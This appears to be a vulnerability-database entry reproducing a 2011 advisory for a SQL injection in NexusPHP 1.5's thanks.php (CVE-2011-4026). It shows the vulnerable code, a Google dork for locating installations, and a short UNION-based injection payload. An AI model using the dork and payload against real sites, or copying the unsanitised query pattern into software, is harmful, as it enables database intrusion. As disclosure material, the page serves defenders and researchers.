Lucene search
K

NexusPHP 1.5 - SQL Injection

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 47 Views

NexusPHP.v1.5 SQL Injection Vulnerability in thanks.ph

Related
Code
ReporterTitlePublishedViews
Family
0day.today
NexusPHP v1.5 SQL Injection
7 Oct 201100:00
zdt
CVE
CVE-2011-4026
21 Oct 201118:00
cve
Cvelist
CVE-2011-4026
21 Oct 201118:00
cvelist
Exploit DB
NexusPHP 1.5 - SQL Injection
8 Oct 201100:00
exploitdb
EUVD
EUVD-2011-3979
7 Oct 202500:30
euvd
exploitpack
NexusPHP 1.5 - SQL Injection
8 Oct 201100:00
exploitpack
NVD
CVE-2011-4026
21 Oct 201118:55
nvd
Packet Storm
NexusPHP 1.5 SQL Injection
9 Oct 201100:00
packetstorm
Prion
Sql injection
21 Oct 201118:55
prion

                                                # Exploit Title: Nexusphp.v1.5 SQL injection Vulnerability
# Google Dork: intitle:nexusphp
# Date: 2011-10-08
# Author: flyh4t
# Software Link: http://sourceforge.net/projects/nexusphp/
# Version: nexusphp.v1.5
# Tested on: linux+apache
# CVE : CVE-2011-4026


Nexusphp is BitTorrent private tracker scripts written in PHP 
The codes is here http://sourceforge.net/projects/nexusphp/
There is a sql injectiong Vulnerability in thanks.php.
 
-----------------------vul code-------------------
//thanks.php
if ($_GET['id'])
 stderr("Party is over!", "This trick doesn't work anymore. You need to click the button!");
$userid = $CURUSER["id"];
$torrentid = $_POST["id"];
$tsql = sql_query("SELECT owner FROM torrents where id=$torrentid");
$arr = mysql_fetch_array($tsql);
-----------------------vul code end-------------------
 
 $_POST["id"] is not checked, lead a sql injection Vulnerability

-----------------------exploit-------------------

_POST[id] : -1 union select version()>4/*

-----------------------exploit end -------------------


                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.00343
47